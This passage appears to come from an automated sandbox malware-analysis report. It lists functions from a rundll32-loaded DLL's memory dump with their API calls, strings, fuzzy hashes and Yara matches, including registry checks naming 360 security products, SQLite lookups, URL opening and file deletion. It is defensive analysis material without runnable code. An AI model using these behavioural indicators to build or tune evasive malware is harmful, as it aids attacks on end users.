_swprintf_c_l.LIBCMT ref: 000000018006AA1B
_swprintf_c_l.LIBCMT ref: 000000018006AA86
_swprintf_c_l.LIBCMT ref: 000000018006AB3B
_swprintf_c_l.LIBCMT ref: 000000018006AD15

Strings

INIT, xrefs: 000000018006AD63

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
String ID: INIT
API String ID: 2772675779-4041279936
Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010B58 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B

Strings

360scan, xrefs: 0000000180010BBB

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuememmove
String ID: 360scan
API String ID: 1121107697-2450673717
Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008023C Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180080256
_CxxThrowException.MSVCRT ref: 0000000180080276
_CxxThrowException.MSVCRT ref: 0000000180080296

Part of subcall function 000000018000EF8C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000F01A

_CxxThrowException.MSVCRT ref: 00000001800802BA
_CxxThrowException.MSVCRT ref: 00000001800802DA
_CxxThrowException.MSVCRT ref: 00000001800802FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180080312

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$??3@
String ID:
API String ID: 3542664073-0
Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE745C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31nativefileCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00000235B5CE74A2
NtOpenFile.NTDLL ref: 00000235B5CE74D6
NtClose.NTDLL ref: 00000235B5CE74F0

Strings

@, xrefs: 00000235B5CE7482
0, xrefs: 00000235B5CE748D
, xrefs: 00000235B5CE74B2

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseFileInitOpenStringUnicode
String ID: $0$@
API String ID: 3719522541-2347541974
Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction ID: c48164ff7ca8e6107e08503a73959e55a6f9537df0ed3125ae114e58c33eae82
Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction Fuzzy Hash: 0201ED72159A9086E754DF10E45839BBB62F3C4798F501425F28E43AACDB7DC68DCF40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066C52
GetLastError.KERNEL32 ref: 0000000180066C9D
IsDebuggerPresent.KERNEL32 ref: 0000000180066CB5
OutputDebugStringW.KERNEL32 ref: 0000000180066CC6

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentStringmemset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 1848478996-631824599
Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE8D90 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00000235B5CE8DF7
InternetOpenUrlW.WININET ref: 00000235B5CE8E33
InternetCloseHandle.WININET ref: 00000235B5CE8F33
InternetCloseHandle.WININET ref: 00000235B5CE8F46

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
Instruction ID: 0249f3430b44b26ba22e7f25cb9336d7ad50e0556ee5a55f0cd0186656ed57ee
Opcode Fuzzy Hash: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
Instruction Fuzzy Hash: B641E876219E9086E7A4CB15F45871AB3A2F3C5748F101425F78E83B98CF7DD949CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180082A18 Relevance: 7.6, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180082A35
_CxxThrowException.MSVCRT ref: 0000000180082A55
_CxxThrowException.MSVCRT ref: 0000000180082A75
_CxxThrowException.MSVCRT ref: 0000000180082A95
_CxxThrowException.MSVCRT ref: 0000000180082AB8
_CxxThrowException.MSVCRT ref: 0000000180082ADB

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7694 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00000235B5CE76D1
NtDeleteFile.NTDLL ref: 00000235B5CE76E6

Strings

@, xrefs: 00000235B5CE76B4
0, xrefs: 00000235B5CE76BC

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFileInitStringUnicode
String ID: 0$@
API String ID: 3559453722-1545510068
Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction ID: 930c372a3bb1702a9d3090e267328d5f93c07b85f484fee64c6288e505e04963
Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction Fuzzy Hash: 5BF01772218A9186D7609F00E45834BBBA5F780788FA00115F28E47A68CB7CC65DCF00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE1A08 Relevance: 6.1, APIs: 4, Instructions: 113fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

FindFirstFileA.KERNEL32 ref: 00000235B5CE1AC7
wsprintfA.USER32 ref: 00000235B5CE1B95
FindNextFileA.KERNEL32 ref: 00000235B5CE1BC2
FindClose.KERNEL32 ref: 00000235B5CE1BD5

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
String ID:
API String ID: 65906682-0
Opcode ID: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
Instruction ID: 9f118c71cfc2fcb58e2ec24103250769a800070b30e52d014e436b782d4e0f55
Opcode Fuzzy Hash: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
Instruction Fuzzy Hash: 8E513E32159F9591EA64DB00E44839AF367F784388F401935E68E426ADEF7CD75DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062600 Relevance: 5.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800626EE
memset.MSVCRT ref: 0000000180062710
memmove.MSVCRT ref: 00000001800627F5
memmove.MSVCRT ref: 0000000180062865

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7ACC Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00000235B5CE77B0: RtlInitUnicodeString.NTDLL ref: 00000235B5CE781B
Part of subcall function 00000235B5CE77B0: NtCreateFile.NTDLL ref: 00000235B5CE7898

NtClose.NTDLL ref: 00000235B5CE7B2E

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileInitStringUnicode
String ID:
API String ID: 3299502662-0
Opcode ID: ba46e55e090a69e480c2f96100f762311f73f5923b28a719c166c648680e9e9a
Instruction ID: ae1ccd64cabc01ce5f812c12172105adf33c51ac2ed2cb20e4301dc0bec12ad8
Opcode Fuzzy Hash: ba46e55e090a69e480c2f96100f762311f73f5923b28a719c166c648680e9e9a
Instruction Fuzzy Hash: 09F01472208A9086D730DB15E44520EBBB2F388788F500624EA8C43A69CBBCC6598F40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7704 Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON

Download Yara Rule

APIs

NtQueryInformationFile.NTDLL ref: 00000235B5CE774D

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction ID: 0502ffc896979534be141a16134418ee654306221ad494db0cd63f399020a194
Opcode Fuzzy Hash: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction Fuzzy Hash: E4F03072228ED5C2E7449B50E84978EE762F7C0B98F504425A58D97BACCFBCC65D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CECB54 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 00000235B5CECB76

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2658e8e1e7c21a952095abd3ff06db641739bea2f09a4534dec18fc3291b33c3
Instruction ID: 104b8e8b6b36d4f86e4b0a526f12fa1620dd32a4a80309ba7b82ba4db69d44ba
Opcode Fuzzy Hash: 2658e8e1e7c21a952095abd3ff06db641739bea2f09a4534dec18fc3291b33c3
Instruction Fuzzy Hash: 19D0C772614B8087CB185B14E44510AB761F795308FD04519E68D45758DA3CC625CF04

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A2C8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 000000018006A2F1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CF0EF8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c366498ca1ad9a9211bb63a0086326fd0b490cb1db94dbea9a14e8d7dbd25069
Instruction ID: c3d3faa7541e6244f19cb8ad00192a1d4e792714aa5193705fdf85cefa6b040c
Opcode Fuzzy Hash: c366498ca1ad9a9211bb63a0086326fd0b490cb1db94dbea9a14e8d7dbd25069
Instruction Fuzzy Hash: 37E0B697A4EFE05AE3A74A340C291193F726692D1478F85C7D685D31C3D08C0E2C8322

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CF0AF0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc971794fb8e582923c3df82f19bbd450a2e9ee515d4c3b9fc051fefc8e1b866
Instruction ID: a7f767e2bec94f01445afd5499ac7a87b3165cdcba1ca991cde05855151dab86
Opcode Fuzzy Hash: fc971794fb8e582923c3df82f19bbd450a2e9ee515d4c3b9fc051fefc8e1b866
Instruction Fuzzy Hash: B1C09B4F77EFF046F1974634081D20C5F935792D15B4D44CADB55135C7D1C4190D8235

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060FE0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 126libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 0000000180061027
GetProcAddress.KERNEL32 ref: 0000000180061044
GetProcAddress.KERNEL32 ref: 0000000180061061
GetProcAddress.KERNEL32 ref: 000000018006107E
GetProcAddress.KERNEL32 ref: 000000018006109B
GetProcAddress.KERNEL32 ref: 00000001800610B8
GetProcAddress.KERNEL32 ref: 00000001800610D5
GetProcAddress.KERNEL32 ref: 00000001800610F2
GetProcAddress.KERNEL32 ref: 000000018006110F
GetProcAddress.KERNEL32 ref: 000000018006112C
GetProcAddress.KERNEL32 ref: 0000000180061149
GetProcAddress.KERNEL32 ref: 0000000180061166
GetProcAddress.KERNEL32 ref: 0000000180061183
GetProcAddress.KERNEL32 ref: 000000018006119C
GetProcAddress.KERNEL32 ref: 00000001800611B5
GetProcAddress.KERNEL32 ref: 00000001800611D1

Strings

sqlite3_bind_int64, xrefs: 00000001800610B1
sqlite3_reset, xrefs: 0000000180061094
sqlite3_bind_parameter_index, xrefs: 00000001800611E6
sqlite3_finalize, xrefs: 0000000180061195
sqlite3_column_text16, xrefs: 0000000180061142
sqlite3_open16, xrefs: 000000018006101D
sqlite3_bind_int, xrefs: 00000001800610CE
sqlite3_bind_blob, xrefs: 00000001800610EB
sqlite3_exec, xrefs: 000000018006105A
sqlite3_close, xrefs: 000000018006103D
sqlite3_bind_text16, xrefs: 0000000180061108
sqlite3_column_int64, xrefs: 000000018006117C
sqlite3_step, xrefs: 00000001800611AE
sqlite3_prepare16_v2, xrefs: 0000000180061077
sqlite3_column_blob, xrefs: 0000000180061125
sqlite3_column_bytes, xrefs: 00000001800611CA
sqlite3_column_int, xrefs: 000000018006115F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
API String ID: 190572456-2634604785
Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AC40 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 242COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 000000018005AD27
VariantInit.OLEAUT32 ref: 000000018005AD40
VariantClear.OLEAUT32 ref: 000000018005AD67
VariantClear.OLEAUT32 ref: 000000018005AD72
VariantClear.OLEAUT32 ref: 000000018005AF35
VariantClear.OLEAUT32 ref: 000000018005AF40

Strings

update_first_open, xrefs: 000000018005AE57
name, xrefs: 000000018005AD52
propoganda, xrefs: 000000018005AE90
value, xrefs: 000000018005AD99
install_first_open, xrefs: 000000018005AE3C
tray_startup, xrefs: 000000018005AE73
pop_count, xrefs: 000000018005AEAC
//root/config/item, xrefs: 000000018005AC7D

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Variant$Clear$Init
String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
API String ID: 3740757921-2166998829
Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006442C Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 170libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180064485
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
GetLastError.KERNEL32 ref: 000000018006449C
EnterCriticalSection.KERNEL32 ref: 00000001800644C5
memset.MSVCRT ref: 00000001800644DB
GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
PathAppendW.SHLWAPI ref: 0000000180064508
PathAppendW.SHLWAPI ref: 000000018006451C
GetProcAddress.KERNEL32 ref: 0000000180064549
GetProcAddress.KERNEL32 ref: 000000018006455E
GetProcAddress.KERNEL32 ref: 0000000180064573
GetProcAddress.KERNEL32 ref: 0000000180064588
GetProcAddress.KERNEL32 ref: 000000018006459D
memset.MSVCRT ref: 00000001800645E5
FreeLibrary.KERNEL32 ref: 0000000180064691
LeaveCriticalSection.KERNEL32 ref: 00000001800646A3
??3@YAXPEAX@Z.MSVCRT ref: 00000001800646FD

Strings

..\deepscan\, xrefs: 00000001800644FA
QuerySetOption, xrefs: 0000000180064592
cloudcom2.dll, xrefs: 000000018006450E
QueryFileCreate, xrefs: 000000018006453F
QueryFileCancel, xrefs: 000000018006457D
360util, xrefs: 0000000180064628
360Safe, xrefs: 000000018006460E
QueryFileClose, xrefs: 0000000180064553
QueryFilesEx2, xrefs: 0000000180064568

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

